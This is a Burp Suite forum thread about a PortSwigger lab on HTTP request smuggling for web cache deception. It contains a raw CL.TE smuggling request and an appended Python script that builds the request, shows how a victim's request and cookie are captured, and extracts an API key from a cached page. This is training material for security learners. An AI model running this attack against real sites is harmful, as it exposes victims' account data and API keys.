Burp Suite User Forum


Lab: Exploiting HTTP request smuggling to perform web cache deception (Solution incorrect)

| Last updated: Nov 26, 2019 06:57AM UTC

The solution for Lab: Exploiting HTTP request smuggling to perform web cache deception is INCORRECT. The lab appears to have been updated and is no longer using the /apiKey function. Instead it has been replaced with /my-account, which has an update email address function, /my-account/change-email. I have tried the original solution with /apiKey changed to /my-account. I have also tried using a double carriage return after X-Ignore: X, which produces some interesting results. However, I cannot for the life of me solve the updated lab. Please help or update the solution appropriately.

Burp User | Last updated: Nov 26, 2019 07:06AM UTC

Also, not sure if this is an issue, but GET /academyLabHeader HTTP/1.1 is returning an HTTP/1.1 404 Not Found.

Burp User | Last updated: Nov 26, 2019 07:49AM UTC

OK - I finally solved it, but I am not sure it is the "intended" way. I used the following with no success for ages:

    POST / HTTP/1.1
    Host: xxx-your-lab-id-xxx.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 42
    Transfer-Encoding: chunked

    0

    GET /my-account HTTP/1.1
    X-Ignore: X

I then added 3 additional CRLFs after the X-Ignore: X and submitted several times. This definitely caused the request to be smuggled and caused some interesting results. I then reverted to the above request and submitted several times in Repeater. It was the Repeater results in the Burp Search for "POST /" that eventually returned the API key... weird! Other people have reported that refreshing the /login page might work and return the results in /resources/css/labs.css, although that did not work for me.

Ben, PortSwigger Agent | Last updated: Nov 26, 2019 09:15AM UTC

Hi Andrew, Thank you for your message. You are correct. We have recently changed some of the Web Academy infrastructure and the solutions are slightly out of sync with the changes that have been made. We are working hard to provide updates to the listed solutions but this will take some time. I was able to complete the lab by changing the smuggled GET request to use my-account instead of apiKey so that should work. It is also worth noting that the solutions provided are only one way of completing the labs so you should feel free to experiment with other approaches to see if they also work.
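The CL.TE payload discussed in this thread, as an added worked example (my code, not PortSwigger's solution and not the lab's own code). It builds the attack request with a Content-Length computed from the real body, so swapping /apiKey for /my-account cannot leave a stale length, and then frames the same bytes the way a Content-Length front-end and a Transfer-Encoding back-end each do, which shows exactly what is left on the back-end connection and how the next user's request is absorbed into the X-Ignore header. The lab host name, the victim request and the "Your API Key is:" marker in the sample response body are placeholders and constructed data, labelled as such in the comments.

```python
"""CL.TE request smuggling helper (added example, not PortSwigger's code).

Assumptions: the lab host name is a placeholder; the victim request and the
/my-account response body used by the demo are constructed; the
"Your API Key is:" marker is an assumed page format.
"""
import re
import socket
import ssl
from typing import Optional, Tuple

CRLF = b"\r\n"


def build_cl_te(host: str, smuggled_path: str = "/my-account",
                extra_crlf: int = 0) -> bytes:
    """Build the CL.TE attack request.

    Body = chunked terminator "0\\r\\n\\r\\n" + first lines of the smuggled
    request. Content-Length is derived from the actual body, so changing the
    path (or appending blank lines, as the thread experiments with) keeps it
    correct. extra_crlf appends that many CRLFs after "X-Ignore: X".
    """
    smuggled = (f"GET {smuggled_path} HTTP/1.1\r\n"
                "X-Ignore: X").encode() + CRLF * extra_crlf
    body = b"0" + CRLF + CRLF + smuggled
    head = ("POST / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Transfer-Encoding: chunked\r\n\r\n").encode()
    return head + body


def split_as_frontend(raw: bytes) -> Tuple[bytes, bytes]:
    """Frame the bytes like a Content-Length front-end.

    Returns (request forwarded, bytes left unread). For a correct CL.TE
    payload the leftover is empty: the whole smuggled prefix looks like body.
    """
    head, _, rest = raw.partition(CRLF + CRLF)
    m = re.search(rb"(?im)^content-length:[ \t]*(\d+)", head)
    n = int(m.group(1)) if m else 0
    return head + CRLF + CRLF + rest[:n], rest[n:]


def split_as_backend(raw: bytes) -> Tuple[bytes, bytes]:
    """Frame the same bytes like a Transfer-Encoding back-end.

    Reads chunks up to the zero-size chunk and its blank line (no trailers
    assumed). Everything after it stays on the connection and becomes the
    prefix of the next request the back-end parses.
    """
    head, _, rest = raw.partition(CRLF + CRLF)
    consumed = b""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        consumed += size_line + CRLF
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            blank, _, rest = rest.partition(CRLF)  # end of trailer section
            consumed += blank + CRLF
            break
        consumed += rest[:size] + CRLF
        rest = rest[size + len(CRLF):]
    return head + CRLF + CRLF + consumed, rest


def poisoned_next_request(leftover: bytes, victim: bytes) -> bytes:
    """What the back-end parses when the victim's request arrives: the
    victim's request line lands inside the X-Ignore header value, so the
    smuggled path is served with the victim's Cookie header."""
    return leftover + victim


def extract_api_key(body: str) -> Optional[str]:
    """Pull the key out of a cached /my-account body (marker is assumed)."""
    m = re.search(r"Your API Key is:\s*([A-Za-z0-9]+)", body)
    return m.group(1) if m else None


def send_raw(host: str, request: bytes, port: int = 443) -> bytes:
    """Send pre-built bytes over TLS and return whatever comes back before
    the server closes or the read times out. Not run by the demo; only use
    it against your own lab instance."""
    ctx = ssl.create_default_context()
    chunks = []
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(request)
            try:
                while data := tls.recv(65536):
                    chunks.append(data)
            except socket.timeout:
                pass
    return b"".join(chunks)


if __name__ == "__main__":
    attack = build_cl_te("xxx-your-lab-id-xxx.web-security-academy.net")
    _, be_left = split_as_backend(attack)
    # Constructed victim request: a browser fetching a static, cacheable file.
    victim = (b"GET /resources/css/labs.css HTTP/1.1\r\n"
              b"Host: xxx-your-lab-id-xxx.web-security-academy.net\r\n"
              b"Cookie: session=VICTIM-SESSION\r\n\r\n")
    print(poisoned_next_request(be_left, victim).decode())
```

Two things the framing functions make visible. First, the body "0\r\n\r\nGET /my-account HTTP/1.1\r\nX-Ignore: X" is 42 bytes and "0\r\n\r\nGET /apiKey HTTP/1.1\r\nX-Ignore: X" is 38, so a hand-edited path needs a hand-edited Content-Length; the builder avoids that. Second, with the extra CRLFs from the experiment in the thread, the leftover on the back-end connection already contains a blank line, so the back-end treats the smuggled GET as a complete request of its own rather than one that absorbs the victim's request line and cookie, which is why that variant behaves differently. The cache deception part is in the victim request: the front-end asked for a static file such as labs.css, receives the /my-account response for it, and can cache that body under the static URL.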
